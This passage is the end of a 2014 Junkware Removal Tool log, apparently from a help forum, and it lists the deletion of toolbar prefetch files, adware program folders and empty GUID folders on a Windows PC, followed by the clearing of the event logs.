Successfully deleted: [File] C:\windows\prefetch\GOOGLETOOLBARMANAGER_8CA8B414-8A88BD82.pf
Successfully deleted: [File] C:\windows\prefetch\GOOGLETOOLBARNOTIFIER.EXE-7AE0A20E.pf
Successfully deleted: [File] C:\windows\prefetch\GOOGLETOOLBARUSER_32.EXE-34B1B1C5.pf

 

~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\best buy pc app"
Successfully deleted: [Folder] "C:\Users\Owner\appdata\local\best buy pc app"
Successfully deleted: [Folder] "C:\Users\Owner\appdata\local\pc_drivers_headquarters"
Successfully deleted: [Folder] "C:\Program Files (x86)\bucksbee loyalty plugin - 100815"
Successfully deleted: [Folder] "C:\ai_recyclebin"
Successfully deleted: [Folder] "C:\windows\syswow64\ai_recyclebin"
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{072DE87B-4B6A-40D4-8F80-0A5ACEFE4EC1}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{180D8750-2D20-4239-8FD7-7CE61016AE48}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{1D96466C-D2F1-495F-8FE7-0DF844A41DAA}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{2E8064C7-A5F8-4B0C-993C-B3E74D2851B9}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{44FD7CB8-60E3-448C-BC25-16174ADD6C6C}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{4BC8E832-E487-46A2-92B8-206E5F92AB3E}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{4D76B10B-19A5-4197-A1B0-2DC946D93C74}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{5F9AD202-E89E-44E6-A387-7BF33A95AF18}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{62A10E0F-687A-4AA2-9944-1F9710D33255}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{6D0A89AB-2266-411C-8662-900B1A182001}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{71703D6C-1A64-4D6D-8F27-123E5BC82F0D}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{71C493E7-2286-4120-ABA2-390BF33CC89D}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{75564AB6-AAEE-475D-8547-EB25F2D86BE7}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{7A0E19BE-BFCC-4E67-B99E-FD8D51451A53}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{7D6FA57C-9F63-4920-A3A3-F4ECDBA6EF7A}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{7DF5534A-6355-4A77-B444-D090B5AA9B90}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{80727867-4C0B-46FD-9408-81EB093FD04C}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{91C87F94-637F-4D47-B91C-210457E7638B}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{9FA20B5F-D2EF-4655-BC01-9968A8572122}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{B3C976EE-2872-4E39-8291-3AF0D9BCE5F9}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{C069F15F-3C8C-4728-B7EA-C8338F21A72C}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{C64B2AE7-0719-4361-B083-555BE5F846D9}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{D108C202-4C3C-44FF-AF57-83942FF38968}
Successfully deleted: [Empty Folder] C:\Users\Owner\appdata\local\{E479ED41-26FF-4662-A1EC-9A0DB523F824}

 

~~~ Event Viewer Logs were cleared

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 12/04/2014 at 16:43:34.71
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

